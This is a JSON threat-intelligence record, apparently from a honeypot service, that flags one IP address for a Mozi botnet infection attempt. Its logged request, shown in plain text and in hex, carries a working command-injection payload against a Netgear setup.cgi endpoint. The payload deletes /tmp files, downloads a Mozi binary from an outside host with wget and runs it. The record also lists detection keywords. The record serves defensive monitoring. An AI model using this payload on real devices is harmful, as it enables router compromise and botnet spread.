{"ip":"42.232.238.126","total_events":1,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"1 loader / command-injection payload(s)","confidence":"medium","network_type":"nsp","why":["1 request(s) carried a loader or command-injection payload (wget, curl, tftp, busybox, chmod or a known bot name).","This is the same evidence that puts an address in the public exploiter feed, so the feed and this page now agree.","Payload evidence stands on its own: one request that fetches a botnet binary is exploitation, not probing.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"177 bytes sent","bytes_sent":177,"session_seconds":0,"persistent":false}},"first_seen":"2026-08-04T04:14:05","last_seen":"2026-08-04T04:14:05","events_24h":0,"events_7d":1,"geo":{"country_code":"CN","country_name":"China","region":"","city":"","lat":34.7732,"lon":113.722,"asn":4837,"org":"CHINA UNICOM China169 Backbone"},"source_domain":"hn.kd.ny.adsl","known_scanners":[],"scanner_tag":{"key":"peeringdb:as4837","label":"China Unicom","category":"isp","url":"https://www.peeringdb.com/asn/4837"},"cve_matches":[],"malware":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2462},"user_agents":[],"timeline":[{"date":"2026-08-04","count":1}],"recent_events":[{"timestamp":"2026-08-04T04:14:05","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.232.238.126:40504/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","summary":"","payload_hex":"474554202f73657475702e6367693f6e6578745f66696c653d6e6574676561722e63666726746f646f3d737973636d6426636d643d726d2b2d72662b2f746d702f2a3b776765742b687474703a2f2f34322e3233322e3233382e3132363a34303530342f4d6f7a692e6d2b2d4f2b2f746d702f6e6574676561723b73682b6e65746765617226637572706174683d2f2663757272656e7473657474696e672e68746d3d3120485454502f312e300d0a0d0a","method":"GET","user_agent":"","ja3":"","session":"309d362d-8e43-4bec-8d70-a14529e36cf1","seq":1,"duration_ms":101,"bytes_in":177,"bytes_out":79}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.232.238.126:40504/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-08-05T13:47:45.920120+00:00"}